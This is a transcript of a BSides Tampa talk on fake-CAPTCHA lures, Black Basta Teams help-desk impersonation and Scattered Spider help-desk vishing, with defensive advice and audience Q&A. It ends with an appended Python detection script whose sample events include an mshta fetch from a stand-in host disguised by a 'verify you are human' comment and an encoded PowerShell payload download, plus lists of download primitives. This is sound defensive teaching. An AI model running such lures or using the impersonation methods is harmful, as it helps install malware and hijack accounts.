
From Hooks to Shields: The Evolution of Phishing and the Art of Defense

BSides Tampa, 32:02, 125 views, published 2025-07
Category: Technical
Style: Talk
About this talk
2025 BSides Tampa: From Hooks to Shields: The Evolution of Phishing and the Art of Defense, by John Dilgen

Description: In this presentation, I will explore some of the most notable phishing methods identified by RQ over the past year, focusing on real-world examples and practical defense strategies. The session will cover 3 key phishing techniques, including Black Basta Teams impersonation, CAPTCHA-based attacks that lead to user execution, and Scattered Spider VIP impersonation. For each method, I will provide tangible examples, along with insights into investigation and detection approaches that can help mitigate these threats. Designed with students in mind, this talk will be delivered at a high level, avoiding overly technical jargon, and fostering a learning mindset. Attendees will gain a clear understanding of how these phishing tactics operate and actionable steps to defend against them. The ultimate goal is to equip participants with foundational knowledge and awareness to navigate today's evolving phishing landscape.
Transcript [en]

Welcome everybody. We'll jump in here. All right. So, as mentioned, we're going to talk about the evolution of phishing attacks. Specifically, we're going to cover three notable tactics that we've seen used against ReliaQuest customers in the last few years. We're going to talk about CAPTCHA-based phishing. We're going to talk about Black Basta Teams impersonation and Scattered Spider VIP impersonation. We're going to go into a breakdown of what the actual tactic is, show you some examples, some notable campaigns, and also how you can defend yourselves and your organizations. First off, I want to start with why we should care about phishing. Very often we think that phishing is just a suspicious email with some typos through it, but it's evolved into many more tactics, as we'll see today, and it still remains one of the most prevalent threats that we see used against ReliaQuest customers successfully to deploy ransomware and steal sensitive data. Ultimately, end users still remain the weakest link in the chain. It's very difficult to get non-technical users to understand how to protect themselves, especially as these tactics keep growing.

>> Can I ask a question?
>> Yeah.
>> Isn't it true that because most, as you just said, most of the attacks are phishing attacks, or you may have a third-party aggregator that's compromised that's holding all the crown jewels anyway, that increasingly more complicated passwords seem to be a nothing sandwich?
>> There is a limit on complex passwords, but it also depends on how the passwords are secured and what's behind them. Definitely. Yeah. As we'll see here, there are a few tactics that threat actors are using to easily get around those.

Yeah. So, we'll start out with CAPTCHA-based phishing. So, what is it? It's a social engineering tactic that tricks the user into executing malicious code. It does this through displaying a popup on the web page in order to instruct the user how to execute the commands. It masquerades as a CAPTCHA. You may have seen these legitimate CAPTCHAs over here; they are used in login portals to verify your identity. You may see the "verify you're not human," or "you are human," excuse me. It's also known as fake CAPTCHA, and it's a child of the ClickFix malware. So ClickFix came before it and also displayed a popup instructing the user to execute code, ultimately downloading malware on their system. So the attack chain goes: everything is driving traffic to the compromised web page. There's quite a few ways it can do this. Malicious ads can be injected into a web page that already has user traffic. Phishing emails can have links directly embedded that then go to the compromised web page, or SEO poisoning, search engine optimization poisoning, is used to drive traffic directly to those compromised web pages. From there, it's redirected to a phishing domain that the attacker controls, where the fake CAPTCHA is then displayed. Over here on the right-hand side, you can see an example of what the fake CAPTCHA actually looks like. It's got very simple instructions for the user to press hotkeys on the command and ultimately execute the malicious command. As it happens, as the web page displays, the malicious command is injected via JavaScript into the user's clipboard without them even knowing.

>> Question. If the user has JavaScript disabled on their browser, that would mediate that, correct? Mitigate that.
>> Yes, that's true. Yeah.

And from there, they're instructed to open up the Run prompt and execute the command themselves, which leads to the malware installation. Let's break down this command a little bit more. All right, as you can see, this is an example of one of the most prevalent commands we've seen. It utilizes the legitimate Windows executable MSHTA, also known as mshta.exe, to execute this HTML file here. It does so from the attacker-controlled domain. And one thing I want to specifically highlight is the "verify you're human" comment seen directly in the command itself. And notice how it's at the end of the command. So specifically what the user sees is just "verify you're a human" in the Run prompt. They don't see anything suspicious in the command itself. So there's nothing to tip them off. Following this, a secondary command is executed via PowerShell, invoking an expression to download another file from another attacker-controlled domain. In this case, a PNG file. So, be careful about these PNG files. We've seen JPEGs, we've seen MP3, MP4 files also being downloaded as malicious scripts. Another thing I want to highlight is the...

>> Can we hold the questions for the end, please, just so there are not too many disruptions. Thank you.

So just to highlight, there's obfuscation taking place throughout. As you can see, the different commands being executed in PowerShell are being defined as these C dollar sign variables. So they can then be executed in one to prevent defenders and security tools from noticing the execution. Another variant we've seen is encoded PowerShell being used. So in this case, the injected command is entirely encoded. So there's no information available to the user whatsoever. The same easy-to-use hotkeys are displayed to the user to execute it. And if you're familiar and technical, you might recognize that the equals sign means that this is encoded in Base64. Overall, we've seen quite a bit of malware executed through this campaign. We've seen info stealers that can harvest credentials and sensitive information off the computer. We've seen remote access trojans, things that give the threat actor control of the infected host. Worms that spread rapidly throughout the environment. Ransomware that encrypts computers and locks them down so they can't be used until a ransom is paid. And finally, rootkits that compromise the underlying hardware of the machine. One of the most notable campaigns we've seen was the use of fake CAPTCHA against hospitality organizations masquerading as Booking.com. So, this was delivered through a phishing email that says within the email that users need to verify their Booking.com account. It was heavily targeted towards hospitality and users who are likely to use Booking.com. The link directly in the email drives them to a fake CAPTCHA website. And this campaign spread info stealers. It spread remote access trojans and worms. Another campaign dealt with malicious ads being injected into video streaming sites. So be careful if you use these free video and TV streaming sites such as Soap2Day and 123Movies, because these had ads directly injected into them to bring you to fake CAPTCHA domains. All right. So, how can you protect yourself? Organizations should instruct users to recognize copy-paste abuse and be very careful when they're instructed from web pages to press Ctrl+V. There's very little use case to ever do that in an actual legitimate environment. You should disable browser credential storage. So, these are targeted by info stealers to get access to accounts. So when you go on Google and you log in, it says, "Would you like me to remember your password?" You should almost always say no. Use those password managers, Bitwarden, LastPass, etc. Limit PowerShell usage. You can deploy a constrained language mode. Essentially, this just prevents non-administrator users from executing certain PowerShell commands. Stops a lot of this. And then the next one, this is the biggest one: disable the Windows Run key in the environment. This completely stops the tactic throughout, no matter how it's deployed. Defenders should monitor for MSHTA commands with suspicious phrases such as "verify you're human." You should also monitor for PowerShell file downloads and encoded PowerShell. These last two here, there are some legitimate use cases, for example, your IT power users who like to do power user things. However, there are very limited use cases that actually happen. The next notable campaign we're going to talk about is Black Basta-based phishing.

If you're not familiar with Black Basta, they are a notorious ransomware-as-a-service group. They've certainly made a name for themselves. This campaign follows an email spam bomb that then leads into Teams phishing, either through a chat message or a phone call, help desk impersonation, and convincing the user to join a remote session and give the attacker control of their machine. If you're not familiar, an email spam bomb takes place when thousands of emails are sent to a user's inbox within minutes. It makes that inbox entirely unusable and also gives the attacker pretext to impersonate the help desk to solve that issue. We've seen this advertised on the dark web for sale, specifically, starting at $9 for one and up to $500 for lifetime access. This works by taking the target email address and signing them up for newsletters and account creations. So that way those instant messages, "thank you for signing up," all get sent over at once. It seems to be a wide range. Those emails that come in to the user are across different languages. We've seen French, Italian, Spanish, Russian, anything the attacker can find. You might also be familiar with this method in personal space. So for example, a family friend of mine experienced something very similar where their personal email was flooded with a bunch of emails. And I theorized that that was likely to hide configuration changes to their payment processing portals so they wouldn't actually notice what was changed by someone who had access to that account. Now, this was a relatively older person, to date things a little bit. They were using a BellSouth email address. So that should help. So definitely an interesting tactic. However, in this case it establishes the pretext for the threat actor to impersonate. So as I mentioned, the communication through Teams can take place via a direct message or a phone call. The communication comes from compromised legitimate tenants. So, organizations that use Office 365 that have been compromised, the attacker can then communicate directly to the target tenant through there, or the attacker spins up these onmicrosoft.com domains, which are very easy for the attacker to spin up and also give the attacker some legitimate context with the Microsoft name in their domain. As you notice, we've seen examples where the subdomain also supports the impersonation pretext. In this case, the subdomain includes "security administrator" or "support service."

Continuing on, the Teams message itself: the chat names will further include "IT support" or "help desk," and all of the dropped files. Once the attacker has control of the machine, the malicious files dropped include naming conventions that support the pretext that they're going to fix the email spam. You can see "filters" in the naming and "anti-spam" in the naming. The Quick Assist, excuse me, the remote session is driven by a few different tools including Quick Assist, Teams, AnyDesk, and ScreenConnect. It's very simple for the threat actor just to provide a code to the user that they can join. One of the most dangerous things about Quick Assist is that it is now native on all Windows 11 hosts. And very similar to what we saw in the fake CAPTCHA, the threat actor can just instruct the user to press a simple hotkey, Windows+Ctrl+Q, and then all of a sudden they see this screen, they enter the code, and they're off to the races. Again, it's very easy to convince a non-technical user just to press a few buttons rather than go searching for a specific program they know nothing about. An interesting piece of this method is that in a customer environment, we saw multiple initial access kill chains taking place simultaneously. What do I mean? So, 15-plus users at this organization received that email spam bomb. From there, phishing Teams chat messages were sent to all of them. We saw one user engage with the threat actor and join that Quick Assist session. Malicious files were then dropped on that host by the threat actor and processes on the host were injected. The threat actor here failed lateral movement, and at this time this host was completely left alone. They didn't come back to it. Then user two joins a Quick Assist session. Malicious files were also dropped on this host and processes were injected. Lateral movement takes place to get to other hosts on the network, ultimately leading to data exfiltration. So it's been theorized that there are multiple groups within Black Basta, one of which is completely responsible for that initial access kill chain, and the other one controls the ransomware deployment and development. That initial access group, they are specializing in the email spam bomb, the help desk impersonation through Teams, Quick Assist sessions, and they also use tools like EvilProxy for credential theft and SystemBC for persistence and C2. The ransomware group itself, they have ties to the previous ransomware-as-a-service group Conti, that has now disbanded. They use similar tactics and malware. They have strict affiliate selection. So, a lot of these other ransomware-as-a-service groups will advertise on the dark web trying to get as many affiliates as possible. Black Basta are established and have notorious reputations in other high-profile campaigns. There's a reason for that we'll see in the next slide. And then finally, they discourage targeting of those former Soviet Union states such as Russia, Belarus, etc., likely pointing that they are from Russia themselves. So if you're unfamiliar, in February 2025, the internal chat communications of Black Basta were leaked and actually provided a lot of valuable insights. So one of the insights is that there were different groups and roles defined within the organization, specifically that intrusion, that initial access group, did exist, including managers, developers, botnet operators, infrastructure management, and EDR research and development trying to get around those defensive tools that are common on hosts. Another interesting insight is that this group charged a million-dollar price tag for year-long access to their software. Likely why they were so selective about their affiliates. They want people who have that capital and actually be able to access the software. This chat communication also showed lots of internal squabbling between the users, specifically things about pay, leadership decisions, and the group's decision to start targeting Russian banks. This caused quite a few of the affiliates to leave the group and go to other groups. So, if you're not familiar, Russia allows threat actors to operate under the pretext that they do not target entities within Russia. You can target enemies of Russia, but do not target us or we will come after you. So, the decision to do this caused a lot of turmoil between the group and caused fear within the group, driving those other users away.

>> Of course, not just Russia. We did that too.
>> Well, fair, state letters of marque. Mhm.

And one of the biggest parallels between this group and Conti is that Conti also had chat logs leaked from a disgruntled user, which is very interesting. So, one of the best parallels that shows this group likely managed affiliates from the two, as you can see from Black Basta. So, on the left-hand side is the number of organizations they name on their data leak site. So essentially, who are they attacking and whose data do they claim they have? From October of 2023 through October of 2024, excuse me, through April of 2024. And on the right-hand side is October of 2024 through April of 2025. You can see in February 2025, at the same time those chat logs were released, a significant drop-off in the actual organizations named on their data leak site. And this signifies the decline of the Black Basta ransomware. However, be mindful that the tactic we addressed here is still very prevalent in organizations. And as I mentioned, that initial access group that is utilizing the tactic is now likely going to move to other ransomware deployments. So, we still see this all the time. So, what can organizations do? First of all, educate those users about Teams phishing. Be very suspicious about the chats that include "help desk." Certainly they can recognize the email spam bomb coming in and know the following steps will likely be social engineering: join a remote session. When I worked desktop support, we almost never had to ask a user to join a session. We always could just control it at will. So depending on what's in your environment, you may have use cases, but we'll show you some methods for that. So if that's the case, educate those users. We will never tell you to join a session. We will just access your computer as needed. Disable unused remote session tools, specifically Quick Assist. Make sure ScreenConnect and other tools you're not using in your environment are disabled and audit regularly for them. And then implement strict help desk verification procedures. So in this case, the problem was the help desk was the threat actor. The user needs to be able to verify who they're talking to through a variety of means. So for example, Teams often integrates with an actual hierarchy. So you can look in Teams to see a hierarchy of users. You can establish predefined passphrases, something like "red, blue, one," just something unique that your organization knows. You can confirm computer names. You can do MFA pushes through certain MFA devices. So for example, when I worked desktop support, we could send a push to the user to confirm identities between the two. So you can set up quite a few different verifications. If possible, block external domain communication through Teams so that those external domains cannot even reach out to you. If not possible, allow-list those approved domains to communicate. Defenders should monitor, or excuse me, should first enable Teams logging, specifically the ChatCreated message. This allows you to see that initial pretext that takes place between the threat actor, and monitor for external Teams chats that include "help desk" or "IT support," specifically those communications from onmicrosoft.com domains, and then also monitor for suspicious files that include "update" or "anti-spam." The final notable tactic we'll talk about is Scattered Spider VIP impersonation. And this tactic takes place from the threat actor contacting the help desk. They impersonate an employee. The help desk resets the account credentials for them and provides the threat actor access to the account. So we're going to look at two separate campaigns, and there are two critical issues around these campaigns. One is that help desk members are not following the standard operating procedures, those SOPs, to verify the user is who they say they are before they reset credentials and provide access. And then the second one is that the verification details that they are being provided are easily discoverable online through OSINT and information gathering. So, if you're not familiar, Scattered Spider, also known as UNC3944, or as one of my fellow co-workers likes to say, UNC 3944, Octo Tempest, and Roasted 0ktapus. They're a loosely associated network of thousands of English-speaking users all over the world. So, a lot of groups are a lot more defined. This one's very loose, hence the name "scattered." They share knowledge and tactics between the two, or excuse me, between them, including social engineering. They're common for phishing domains that include the targeted company name as the subdomain and many variations of "okta-" or "sso-". They also are known for MFA fatigue attacks and ransomware deployment. We'll see quite a few different ransomwares in the chains we'll look at. So the first one we're going to talk about is MGM, the famous casino in Vegas. This is a very public attack that happened in 2023. In this case, OSINT was performed on the employees to discover information and job roles. A call was made to the help desk. From there, the discovered information was provided to the help desk for verification. The help desk resets the credentials. That account is then used to gain administrator privileges. The threat actor is able to move laterally in the network and access other hosts, and ultimately ALPHV ransomware was deployed. This particular attack chain, it was estimated, cost MGM tens of millions of dollars in downtime and security cost. Here's an attack chain that we saw against a manufacturing customer. First, OSINT is performed against the VIP to discover job roles and that key information. A call is made to the help desk. The CFO is impersonated in that call, the chief financial officer. The help desk resets credentials to those accounts. Then the threat actor attempts access to that account but realizes they cannot get through the MFA. In this case, a second impersonation call is made to the help desk. The MFA is very conveniently reset on the CFO's account. The CFO's account is then accessed. We'll continue on to the next page. From there, the CFO's MFA, or multi-factor authentication, device is then paired with an attacker-controlled device. The attacker attempts to use this account to access the Okta admin console. So, Okta is the identity management software. They realize they do not have the proper credentials in this account. However, they are able to discover additional information, specifically the account for a domain admin. So, a third call is now conveniently made to the help desk. Credentials are reset for this account. They use this account to access Okta and Thycotic tenants. If you don't know, Thycotic is a password manager solution. Virtual machines are deployed within VMware ESXi, giving attacker-owned devices in the network. Credentials are ultimately dumped or captured and the data is exfiltrated before RansomHub encryptors are deployed. This caused significant downtime for the organization and ultimately was the result of the help desk not following those verification procedures. Recently, in February and April of 2025, three UK retailers were just hit by a string of ransomware: Marks & Spencer, Co-op, and Harrods.

They deployed DragonForce ransomware in two of three of these attacks. It's theorized that this is Scattered Spider behind this. One of the best pieces of evidence for this is that NCSC has told organizations they should reassess how their IT staff authenticate staff members before resetting passwords. So, very much ties into the tactic we've seen used here. Co-op also warned its employees not to post sensitive info in Teams and to verify co-workers via webcams and calls. So also likely suggesting there's Teams impersonation taking place. How can organizations protect themselves? Educate IT staff about voice phishing, or vishing, VoIP phishing. Implement strict help desk verification procedures. As we mentioned, those unique keywords that your organization establishes, and this time the help desk needs to verify who is on the other end. So you need verification between both, right? Remember in the Black Basta kill chain, we saw that the user needs to verify they're speaking to the help desk. In this case, the help desk needs to verify that they're speaking to the user. Also, you can do those MFA pushes from the help desk. As I mentioned earlier, audit the help desk to make sure they are following these practices. So maybe your CISO just places a casual call. Maybe it's actually implemented in your red team testing, but make sure something is done to verify. Defenders can monitor for MFA resets on high-privilege accounts followed by admin console login, and also monitor for those suspicious domains including your organization's name in the variants of "okta-" or "sso-". All right. So overall, I want to stress that phishing is more than just those common emails with links and malware that we see. Educating users is the organization's best defense against phishing. Tactics will evolve. These will change. However, organizations or end users should be on the lookout for anything suspicious. And then again, strict verification procedures, SOPs, and auditing for help desk communications help stop these attacks. Thank you everyone. As mentioned, my name is John Dilgen. I'm one of the threat analysts at ReliaQuest. Feel free to add me on LinkedIn and I hope you guys enjoy your BSides.

>> Thank you. Questions? I saw you first and we'll get to you.
>> So in the Scattered Spider attack, what's the purpose of the CFO impersonation? We've seen that too, but the CFO is not a domain admin. So what is that part of the chain for?
>> Yeah, it's difficult to say why they targeted there. They may have been hoping for the ability to falsify financial records and reroute payment transactions. We didn't have insight into that, though. We just know that they attempted to get to the Okta and Thycotic tenants and failed.
>> Wire transfer authorizations. It was a good one.
>> Yeah. Question here.

>> Yeah, just three quick ones. When you referenced the PNG earlier, are you guys seeing more that it's an actual image file, movie file, etc., or is it just a renamed file extension?
>> I don't have the data on that. I couldn't actually tell you.
>> Next one. When we look at the Windows Run key and the PowerShell being disabled for Windows users, are we seeing so few of those attacks on the Mac side that it's not worth giving the advice to the Mac people, or should we give the advice to the Mac people?
>> Their equivalent?
>> I don't know. I haven't seen the attacks and their equivalents. So yeah.

>> And finally, we look at email bombs, unless they're rotating MX records and IP addresses, and even if they are, aren't most of the major email services mitigating that automatically?
>> No, unfortunately not. No. Even without the rotated IP address in MX.
>> Yeah.
>> Holy
>> Yeah.
>> Yeah. Wow.
>> Yeah. Unfortunately.
>> You're welcome.
>> Another question.
>> We unfortunately don't have an average. The only one we have is the public information around MGM that was public. That was public estimates, which was I think close to 100 million.
>> Yeah. Yeah. Over here. Question here.
>> Malicious AI models in campaigns. How is that impacting
>> AI models and phishing campaigns? Well, it's certainly making it easier for threat actors to deploy phishing emails very rapidly as well as create those impersonation web pages. However, we're also seeing tools like Darcula being offered that implement the AI phishing kits within them and allow for brand impersonation directly in websites very easily and quickly. Yeah. Question here.
>> Kind of in that same vein, like about agentic workforce help desk, right? So have you seen anybody take advantage of, like, a Salesforce agent to reset a password? That's a very low-level thing that they're trying to implement, and so I just can't wait to social engineer an AI to let me in.
>> Yeah.
>> So have you seen that at all in a while?
>> It's not something I'm familiar with, but it's probably likely. It's probably out there. Yeah.
>> Over here. Post the slides, or is it possible?
>> Yeah. Yeah. So the slides will be posted, as well as the full talk is recorded and will be posted to YouTube. Yep. Cool. Any other questions over here?
>> Do you believe that when you're saying the malicious AI ones, do you think they're better? Like, do you think they trick people better than the ones that are sometimes misspelled by people?
>> Um, yes. Because in high volume, that's what matters. It's ultimately a numbers game, and the AI agents allow you to get them out faster and easier. Yeah. Any other questions? Yes.
>> So do you have any good idea to train people, like in organizations that are not highly technically trained, and they believe that if you help with something they feel like you're going to hack the voice? Do you have any good idea to convince them? We recently had them link themselves to a fake Microsoft
>> login, and they were seeing all that and they just got their information, but
>> they are refusing to use more MFA to verify. Do you have any good idea to convince them?
>> Yeah, I would say the best method is something the organization predefines with the user and the help desk. So, do you have a computer name tag on your workstation, for example, and I can reference that computer name tag to verify who we are, right? It's like a passphrase that we predefined, something goofy, "red blue one" or "Tuesday was yesterday," something like that that's very generic but that's predefined that they can look out for. For those non-technical users it is going to be a challenge, but I would say the organization's best defense is whatever policies they set up in place.
>> Although, you know, academically, if security doesn't hold up when the security algorithm is known, it's not good security.
>> Fair.
>> That's troublesome, isn't it?
>> Yeah. Yep.
>> Yep. Yeah. And that's why it's important to verify and audit them. Definitely. Any other questions? All right. Thank you everyone.
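The monitoring advice given in the talk (MSHTA commands carrying phrases such as "verify you're human", encoded PowerShell, PowerShell file downloads fetched as image or media files, and external Teams chats with a help desk pretext from onmicrosoft.com senders) written out as detection logic over sample records. This is an added example, not code from the talk or from any ReliaQuest tooling; the event field names and all sample log records are constructed for illustration, and a real deployment would map the fields from the EDR or Microsoft 365 audit schema in use.

```python
"""Detection rules for the indicators discussed in the talk, run over constructed samples."""
import base64
import re

# Phrases the fake-CAPTCHA lure appends to the command so the Run prompt looks benign.
SUSPICIOUS_PHRASES = ("verify you're human", "verify you are human", "i am not a robot")
# PowerShell download primitives; IT scripts may use them legitimately, so tune with allow-lists.
DOWNLOAD_TOKENS = ("invoke-webrequest", "invoke-restmethod", "downloadstring",
                   "downloadfile", "net.webclient", "start-bitstransfer", "iwr ", "irm ")
# The talk notes payloads fetched as PNG/JPEG/MP3/MP4 files; flag downloads with those extensions.
MEDIA_URL_RE = re.compile(r"https?://\S+\.(?:png|jpe?g|gif|mp3|mp4)\b", re.I)
# -e / -enc / -EncodedCommand followed by a Base64 blob (UTF-16LE text once decoded).
ENC_FLAG_RE = re.compile(r"-(?:e|en|enc|ec|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Chat display names / subdomains the talk saw used to support the help desk pretext.
HELPDESK_TERMS = ("help desk", "helpdesk", "it support", "security administrator",
                  "support service")


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line has none."""
    match = ENC_FLAG_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process(event):
    """Alert names for one process-creation event: {'image': ..., 'command_line': ...}."""
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "")
    alerts = []
    if image.endswith("mshta.exe") and any(p in cmd.lower() for p in SUSPICIOUS_PHRASES):
        alerts.append("mshta_fake_captcha_phrase")
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_powershell(cmd)
        # Scan the visible command line minus the Base64 blob, plus the decoded payload.
        scan = ENC_FLAG_RE.sub(" ", cmd).lower()
        if decoded is not None:
            alerts.append("powershell_encoded_command")
            scan += " " + decoded.lower()
        if any(token in scan for token in DOWNLOAD_TOKENS):
            alerts.append("powershell_file_download")
            if MEDIA_URL_RE.search(scan):
                alerts.append("powershell_download_media_extension")
    return alerts


def analyze_teams_chat(chat):
    """Alert names for one Teams ChatCreated-style record (field names are assumed)."""
    sender_domain = chat.get("sender", "").lower().rsplit("@", 1)[-1]
    if sender_domain == chat.get("tenant_domain", "").lower():
        return []  # internal senders are out of scope for this rule
    text = (chat.get("display_name", "") + " " + chat.get("message", "")).lower()
    alerts = []
    if sender_domain.endswith(".onmicrosoft.com"):
        alerts.append("teams_external_onmicrosoft_sender")
    if any(term in text for term in HELPDESK_TERMS):
        alerts.append("teams_external_helpdesk_pretext")
    return alerts


# Constructed samples; domains use the reserved .invalid / .example names.
ENCODED_SAMPLE = base64.b64encode(
    "Invoke-WebRequest https://cdn.example.invalid/update.png".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://captcha.example.invalid/v.html # Verify you are human"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell -w hidden -enc {ENCODED_SAMPLE}"},
    {"image": r"C:\Windows\System32\mshta.exe",  # benign: local vendor installer
     "command_line": r"mshta C:\Program Files\Vendor\setup.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign admin script
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\IT\inventory.ps1"},
]
SAMPLE_CHATS = [
    {"tenant_domain": "victim.example", "sender": "admin@securityadministrator.onmicrosoft.com",
     "display_name": "Help Desk", "message": "Your inbox is being flooded; join a Quick Assist session so we can fix it."},
    {"tenant_domain": "victim.example", "sender": "alice@victim.example",
     "display_name": "Alice", "message": "Lunch?"},
    {"tenant_domain": "victim.example", "sender": "bob@partner.example",
     "display_name": "Bob", "message": "Sending the signed contract over now."},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"].rsplit("\\", 1)[-1], "->", analyze_process(ev) or "clean")
    for ch in SAMPLE_CHATS:
        print(ch["sender"], "->", analyze_teams_chat(ch) or "clean")
```

The benign samples show why the talk flags PowerShell downloads and encoded commands as lower-confidence than the MSHTA phrase rule: an admin script with an execution-policy override produces no alert here, while the encoded line is decoded before the download check so the blob cannot hide the fetch.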